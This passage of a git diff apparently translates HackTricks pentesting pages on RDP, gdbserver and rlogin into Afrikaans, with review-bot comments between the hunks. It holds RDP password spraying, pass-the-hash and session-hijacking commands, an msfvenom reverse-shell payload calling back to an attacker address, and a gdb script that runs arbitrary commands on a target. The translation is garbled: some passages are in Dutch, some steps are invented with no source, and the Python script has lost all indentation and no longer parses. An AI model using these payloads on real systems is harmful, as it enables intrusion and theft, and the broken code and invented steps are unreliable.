sagteware deur die gebruiker gebruik, en terselfdertyd moet die afgeleë rekenaar **RDP**-bediener sagteware bedryf. Hierdie opset maak dit moontlik om naadloos beheer en toegang tot die lessenaar-omgewing van 'n verre rekenaar te verkry, waardeur die gebruiker se plaaslike toestel die lessenaar-omgewing kan sien. 
+**Verstekpoort:** 3389 ``` PORT STATE SERVICE 3389/tcp open ms-wbt-server ``` +## Opname -## Enumeration - -### Automatic +### Outomaties {% code overflow="wrap" %} ```bash 
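Review bot: the last clause of the "Basiese Inligting" paragraph, "waardeur die gebruiker se plaaslike toestel die lessenaar-omgewing kan sien", changes the meaning of the source sentence ("essentially bringing its interface to the user's local device"); render it as "wat in wese sy koppelvlak na die gebruiker se plaaslike toestel bring". Also, the `-` blank line before `-**Default port:** 3389` is dropped, so `+**Verstekpoort:** 3389` now sits directly under the paragraph and renders as part of it; restore the blank line.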
@@ -41,151 +39,170 @@ nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 338 ``` {% endcode %} -It checks the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions). +Dit kontroleer die beskikbare enkripsie en DoS kwesbaarheid (sonder om DoS na die diens te veroorsaak) en verkry NTLM Windows-inligting (weergawes). ### [Brute force](../generic-methodologies-and-resources/brute-force.md#rdp) -**Be careful, you could lock accounts** +**Wees versigtig, jy kan rekeninge sluit** -### **Password Spraying** - -**Be careful, you could lock accounts** +### **Wagwoord Spuit** +**Wees versigtig, jy kan rekeninge sluit** ```bash # https://github.com/galkan/crowbar crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123' # hydra hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp ``` +### Verbind met bekende geloofsbriewe/hash -### Connect with known credentials/hash +Om verbinding te maken met een Remote Desktop Protocol (RDP) server, kan je proberen om bekende geloofsbriewe of een hash te gebruiken. Dit kan handig zijn als je toegang wilt krijgen tot een RDP-server waarvan je de geloofsbriewe al kent of waarvan je de hash hebt verkregen. +#### Gebruik van bekende geloofsbriewe + +Als je de gebruikersnaam en het wachtwoord kent van een geldige gebruiker op de RDP-server, kan je deze informatie gebruiken om verbinding te maken. Gebruik de volgende opdracht om verbinding te maken met de server: + +```bash +xfreerdp /u: /p: /v: +``` + +Vervang `` door de geldige gebruikersnaam, `` door het bijbehorende wachtwoord en `` door het IP-adres van de RDP-server. + +#### Gebruik van een hash + +Als je een hash hebt verkregen van de geloofsbriewe van een geldige gebruiker, kan je deze hash gebruiken om verbinding te maken. 
Gebruik de volgende opdracht om verbinding te maken met de server: + +```bash +xfreerdp /u: /pth: /v: +``` + +Vervang `` door de geldige gebruikersnaam en `` door de verkregen NTLM-hash. `` moet worden vervangen door het IP-adres van de RDP-server. + +Opmerking: Het gebruik van een hash om verbinding te maken met een RDP-server kan handig zijn als je de geloofsbriewe niet in platte tekst hebt, maar alleen de hash ervan. ```bash rdesktop -u rdesktop -d -u -p xfreerdp [/d:domain] /u: /p: /v: xfreerdp [/d:domain] /u: /pth: /v: #Pass the hash ``` +### Kontroleer bekende geloofsbriewe teen RDP-dienste -### Check known credentials against RDP services - -rdp\_check.py from impacket let you check if some credentials are valid for a RDP service: - +rdp\_check.py van impacket stel jou in staat om te kontroleer of sekere geloofsbriewe geldig is vir 'n RDP-diens: ```bash rdp_check /:@ ``` - - -
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te laat spat en pret te hê. {% embed url="https://pentest-tools.com/" %} -## **Attacks** +## **Aanvalle** -### Session stealing +### Sessiediefstal -With **SYSTEM permissions** you can access any **opened RDP session by any user** without need to know the password of the owner. - -**Get openned sessions:** +Met **SYSTEM-toestemmings** kan jy toegang verkry tot enige **geopen RDP-sessie deur enige gebruiker** sonder om die wagwoord van die eienaar te weet. +**Kry geopen sessies:** ``` query user ``` +**Toegang tot die gekose sessie** -**Access to the selected session** +Om toegang te verkry tot die gekose sessie, kan jy die volgende stappe volg: +1. Identifiseer die RDP-diens wat jy wil penetreer. +2. Voer 'n skandering uit om die RDP-poort (gewoonlik poort 3389) te vind wat oop is vir kommunikasie. +3. Maak 'n RDP-verbinding met die IP-adres van die doelwitmasjien deur gebruik te maak van 'n RDP-kliënt. +4. As jy 'n geldige gebruikersnaam en wagwoord het, kan jy dit gebruik om aan te meld by die RDP-sessie. +5. As jy nie geldige aanmeldingsbesonderhede het nie, kan jy probeer om 'n aanval uit te voer om toegang te verkry. 
Hier is 'n paar moontlike aanvalstegnieke: + - Brute force-aanval: Probeer om verskillende kombinasies van gebruikersname en wagwoorde te gebruik totdat jy suksesvol aanmeld. + - Woordeboekaanval: Gebruik 'n woordeboek van algemene wagwoorde om te probeer om aan te meld. + - Pass-the-Hash-aanval: As jy toegang het tot 'n geldige gebruikershash, kan jy dit gebruik om aan te meld sonder om die wagwoord te ken. + - Man-in-the-Middle-aanval: Probeer om die RDP-verkeer te onderskep en te manipuleer om toegang te verkry. +6. As jy suksesvol toegang verkry het tot die RDP-sessie, kan jy die sessie gebruik om verdere verkennings- en aanvalstegnieke uit te voer. ```bash tscon /dest: ``` +Nou sal jy binne die gekose RDP-sessie wees en jy sal 'n gebruiker moet voorstel deur slegs Windows-gereedskap en funksies te gebruik. -Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features. +**Belangrik**: Wanneer jy toegang verkry tot 'n aktiewe RDP-sessie, sal jy die gebruiker wat dit gebruik het, aftrap. -**Important**: When you access an active RDP sessions you will kickoff the user that was using it. - -You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user (passwords in notepad without been saved in disk, other RDP sessions opened in other machines...) +Jy kan wagwoorde kry deur dit uit die proses te dump, maar hierdie metode is baie vinniger en stel jou in staat om met die virtuele blad van die gebruiker te werk (wagwoorde in notepad sonder om op die skyf gestoor te word, ander RDP-sessies wat op ander masjiene oopgemaak is...) 
#### **Mimikatz** -You could also use mimikatz to do this: - +Jy kan ook mimikatz gebruik om dit te doen: ```bash ts::sessions #Get sessions ts::remote /id:2 #Connect to the session ``` +### Plakkerige sleutels & Utilman -### Sticky-keys & Utilman +Deur deze tegniek te kombineer met **plakkerige sleutels** of **utilman sal jy in staat wees om enige tyd toegang te verkry tot 'n administratiewe CMD en enige RDP-sessie** -Combining this technique with **stickykeys** or **utilman you will be able to access a administrative CMD and any RDP session anytime** +Jy kan soek na RDP's wat reeds met een van hierdie tegnieke agterdeur is met: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer) -You can search RDPs that have been backdoored with one of these techniques already with: [https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer) +### RDP-prosesinjeksie -### RDP Process Injection - -If someone from a different domain or with **better privileges login via RDP** to the PC where **you are an Admin**, you can **inject** your beacon in his **RDP session process** and act as him: +As iemand van 'n ander domein of met **betere voorregte inlog via RDP** na die rekenaar waar **jy 'n Admin is**, kan jy jou sein in sy **RDP-sessieproses** inspuit en as hom optree: {% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} [rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md) {% endcontent-ref %} -### Adding User to RDP group - +### Gebruiker byvoeg tot RDP-groep ```bash net localgroup "Remote Desktop Users" UserLoginName /add ``` - -## Automatic Tools +## Outomatiese Gereedskap * [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn) -**AutoRDPwn** is a post-exploitation framework created in Powershell, designed primarily to automate the **Shadow** attack on Microsoft Windows computers. 
This vulnerability (listed as a feature by Microsoft) allows a remote attacker to **view his victim's desktop without his consent**, and even control it on demand, using tools native to the operating system itself. +**AutoRDPwn** is 'n post-exploitation raamwerk wat in Powershell geskep is en hoofsaaklik ontwerp is om die **Shadow**-aanval op Microsoft Windows-rekenaars outomaties te outomatiseer. Hierdie kwesbaarheid (deur Microsoft as 'n funksie gelys) stel 'n afgeleë aanvaller in staat om **sy slagoffer se lessenaar sonder sy toestemming te sien**, en selfs op aanvraag te beheer, deur gebruik te maak van hulpmiddels wat inherent is aan die bedryfstelsel self. * [**EvilRDP**](https://github.com/skelsec/evilrdp) - * Control mouse and keyboard in an automated way from command line - * Control clipboard in an automated way from command line - * Spawn a SOCKS proxy from the client that channels network communication to the target via RDP - * Execute arbitrary SHELL and PowerShell commands on the target without uploading files - * Upload and download files to/from the target even when file transfers are disabled on the target - -## HackTricks Automatic Commands +* Beheer muis en sleutelbord outomaties vanaf die opdraglyn +* Beheer knipbord outomaties vanaf die opdraglyn +* Skep 'n SOCKS-proksi vanaf die kliënt wat netwerk kommunikasie na die teiken deur RDP kanaliseer +* Voer willekeurige SHELL- en PowerShell-opdragte op die teiken uit sonder om lêers op te laai +* Laai lêers op en aflaai vanaf die teiken, selfs as lêeroordragte op die teiken gedeaktiveer is +## HackTricks Outomatiese Opdragte ``` Protocol_Name: RDP #Protocol Abbreviation if there is one. Port_Number: 3389 #Comma separated if there is more than one. 
Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for RDP - Note: | - Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device. +Name: Notes +Description: Notes for RDP +Note: | +Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device. - https://book.hacktricks.xyz/pentesting/pentesting-rdp +https://book.hacktricks.xyz/pentesting/pentesting-rdp Entry_2: - Name: Nmap - Description: Nmap with RDP Scripts - Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP} +Name: Nmap +Description: Nmap with RDP Scripts +Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP} ``` -
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsbeoordeling en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
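Review bot: in the `HackTricks Automatic Commands` block the translated `+` lines drop the indentation the original had under `Entry_1:` and `Entry_2:` (`- Name: Notes` becomes `+Name: Notes`, `- Command: nmap ...` becomes `+Command: nmap ...`), which flattens the nested structure of that block; restore the leading spaces so the entries stay nested under their `Entry_N:` keys. This is a translation-only PR, yet the hunk also adds material with no `-` counterpart (the `+ - Brute force-aanval: ...` / `+ - Pass-the-Hash-aanval: ...` list and the `+6. As jy suksesvol toegang verkry het ...` step), which should be dropped rather than introduced under the guise of a translation. Minor wording: `+Deur deze tegniek` uses Dutch `deze` (Afrikaans `hierdie`), `betere voorregte` should be `beter voorregte`, and `outomaties te outomatiseer` is redundant (`te outomatiseer`); the blank lines before several fenced blocks are also removed, which is inconsistent with the rest of the file.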
diff --git a/network-services-pentesting/pentesting-remote-gdbserver.md b/network-services-pentesting/pentesting-remote-gdbserver.md index c30239954..11a5b74fa 100644 --- a/network-services-pentesting/pentesting-remote-gdbserver.md +++ b/network-services-pentesting/pentesting-remote-gdbserver.md @@ -2,36 +2,35 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwetsbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -## **Basic Information** +## **Basiese Inligting** -**gdbserver** is a tool that enables the debugging of programs remotely. It runs alongside the program that needs debugging on the same system, known as the "target." This setup allows the **GNU Debugger** to connect from a different machine, the "host," where the source code and a binary copy of the debugged program are stored. The connection between **gdbserver** and the debugger can be made over TCP or a serial line, allowing for versatile debugging setups. +**gdbserver** is 'n hulpmiddel wat die afstandsondersteuning van programme moontlik maak. Dit loop saam met die program wat foutopsporing benodig op dieselfde stelsel, bekend as die "teiken." Hierdie opset maak dit vir die **GNU Debugger** moontlik om vanaf 'n ander masjien, die "gasheer," waar die bronkode en 'n binêre kopie van die foutopgespoorde program gestoor word, te verbind. Die verbinding tussen **gdbserver** en die foutopspoorprogram kan oor TCP of 'n seriële lyn gemaak word, wat veelsydige foutopsporingsopsette moontlik maak. -You can make a **gdbserver listen in any port** and at the moment **nmap is not capable of recognising the service**. 
+Jy kan 'n **gdbserver laat luister op enige poort** en op hierdie oomblik **is nmap nie in staat om die diens te herken nie**. -## Exploitation +## Uitbuiting -### Upload and Execute - -You can easily create an **elf backdoor with msfvenom**, upload it and execute is: +### Oplaai en Uitvoer +Jy kan maklik 'n **elf agterdeur met msfvenom** skep, dit oplaai en uitvoer: ```bash # Trick shared by @B1n4rySh4d0w msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf @@ -54,11 +53,9 @@ run # You should get your reverse-shell ``` +### Voer willekeurige opdragte uit -### Execute arbitrary commands - -There is another way to **make the debugger execute arbitrary commands via a [python custom script taken from here](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)**. - +Daar is 'n ander manier om die aflynontleder willekeurige opdragte te laat uitvoer deur middel van 'n [python-aangepaste skrip wat hier vandaan geneem is](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target). ```bash # Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server. target extended-remote 192.168.1.4:2345 @@ -77,8 +74,7 @@ r # Run the remote command, e.g. `ls`. rcmd ls ``` - -First of all **create locally this script**: +Eerst en voorsit **skep plaaslik hierdie skrip**: {% code title="remote-cmd.py" %} ```python 
@@ -91,108 +87,108 @@ import uuid class RemoteCmd(gdb.Command): - def __init__(self): - self.addresses = {} +def __init__(self): +self.addresses = {} - self.tmp_file = f'/tmp/{uuid.uuid4().hex}' - gdb.write(f"Using tmp output file: {self.tmp_file}.\n") +self.tmp_file = f'/tmp/{uuid.uuid4().hex}' +gdb.write(f"Using tmp output file: {self.tmp_file}.\n") - gdb.execute("set detach-on-fork off") - gdb.execute("set follow-fork-mode parent") +gdb.execute("set detach-on-fork off") +gdb.execute("set follow-fork-mode parent") - gdb.execute("set max-value-size unlimited") - gdb.execute("set pagination off") - gdb.execute("set print elements 0") - gdb.execute("set print repeats 0") +gdb.execute("set max-value-size unlimited") +gdb.execute("set pagination off") +gdb.execute("set print elements 0") +gdb.execute("set print repeats 0") - super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER) +super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER) - def preload(self): - for symbol in [ - "close", - "execl", - "fork", - "free", - "lseek", - "malloc", - "open", - "read", - ]: - self.load(symbol) +def preload(self): +for symbol in [ +"close", +"execl", +"fork", +"free", +"lseek", +"malloc", +"open", +"read", +]: +self.load(symbol) - def load(self, symbol): - if symbol not in self.addresses: - address_string = gdb.execute(f"info address {symbol}", to_string=True) - match = re.match( - f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE - ) - if match and len(match.groups()) > 0: - self.addresses[symbol] = match.groups()[0] - else: - raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".') +def load(self, symbol): +if symbol not in self.addresses: +address_string = gdb.execute(f"info address {symbol}", to_string=True) +match = re.match( +f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE +) +if match and len(match.groups()) > 0: +self.addresses[symbol] = match.groups()[0] +else: +raise RuntimeError(f'Could not retrieve 
address for symbol "{symbol}".') - return self.addresses[symbol] +return self.addresses[symbol] - def output(self): - # From `fcntl-linux.h` - O_RDONLY = 0 - gdb.execute( - f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})' - ) +def output(self): +# From `fcntl-linux.h` +O_RDONLY = 0 +gdb.execute( +f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})' +) - # From `stdio.h` - SEEK_SET = 0 - SEEK_END = 2 - gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})') - gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})') - if int(gdb.convenience_variable("len")) <= 0: - gdb.write("No output was captured.") - return +# From `stdio.h` +SEEK_SET = 0 +SEEK_END = 2 +gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})') +gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})') +if int(gdb.convenience_variable("len")) <= 0: +gdb.write("No output was captured.") +return - gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)') - gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)') - gdb.execute('printf "%s\\n", (char*) $mem') +gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)') +gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)') +gdb.execute('printf "%s\\n", (char*) $mem') - gdb.execute(f'call (int){self.load("close")}($fd)') - gdb.execute(f'call (int){self.load("free")}($mem)') +gdb.execute(f'call (int){self.load("close")}($fd)') +gdb.execute(f'call (int){self.load("free")}($mem)') - def invoke(self, arg, from_tty): - try: - self.preload() +def invoke(self, arg, from_tty): +try: +self.preload() - is_auto_solib_add = gdb.parameter("auto-solib-add") - gdb.execute("set auto-solib-add off") +is_auto_solib_add = gdb.parameter("auto-solib-add") +gdb.execute("set auto-solib-add off") - parent_inferior = gdb.selected_inferior() - gdb.execute(f'set $child_pid = (int){self.load("fork")}()') - child_pid = gdb.convenience_variable("child_pid") - child_inferior = 
list( - filter(lambda x: x.pid == child_pid, gdb.inferiors()) - )[0] - gdb.execute(f"inferior {child_inferior.num}") +parent_inferior = gdb.selected_inferior() +gdb.execute(f'set $child_pid = (int){self.load("fork")}()') +child_pid = gdb.convenience_variable("child_pid") +child_inferior = list( +filter(lambda x: x.pid == child_pid, gdb.inferiors()) +)[0] +gdb.execute(f"inferior {child_inferior.num}") - try: - gdb.execute( - f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)' - ) - except gdb.error as e: - if ( - "The program being debugged exited while in a function called from GDB" - in str(e) - ): - pass - else: - raise e - finally: - gdb.execute(f"inferior {parent_inferior.num}") - gdb.execute(f"remove-inferiors {child_inferior.num}") +try: +gdb.execute( +f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)' +) +except gdb.error as e: +if ( +"The program being debugged exited while in a function called from GDB" +in str(e) +): +pass +else: +raise e +finally: +gdb.execute(f"inferior {parent_inferior.num}") +gdb.execute(f"remove-inferiors {child_inferior.num}") - self.output() - except Exception as e: - gdb.write("".join(traceback.TracebackException.from_exception(e).format())) - raise e - finally: - gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}') +self.output() +except Exception as e: +gdb.write("".join(traceback.TracebackException.from_exception(e).format())) +raise e +finally: +gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}') RemoteCmd() @@ -201,20 +197,20 @@ RemoteCmd()
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
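Review bot: the `remote-cmd.py` hunk strips all leading indentation from every `+` line (`class RemoteCmd(gdb.Command):` is now followed by `+def __init__(self):` and `+self.addresses = {}` at column 0), and since Python is indentation-sensitive the translated script no longer parses, so `source remote-cmd.py` in gdb will fail; the code block should be left byte-identical to the `-` lines, only the surrounding prose being translated. Wording in the same file: `+Eerst en voorsit` is not Afrikaans (suggest `Eerstens`), and `aflynontleder` for "debugger" is inconsistent with `foutopspoorprogram` used in the Basic Information paragraph, where `afstandsondersteuning` should also read `afstandsfoutopsporing` to match the English "debugging ... remotely".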
diff --git a/network-services-pentesting/pentesting-rlogin.md b/network-services-pentesting/pentesting-rlogin.md index 57b7ad207..9e9487368 100644 --- a/network-services-pentesting/pentesting-rlogin.md +++ b/network-services-pentesting/pentesting-rlogin.md @@ -2,60 +2,68 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
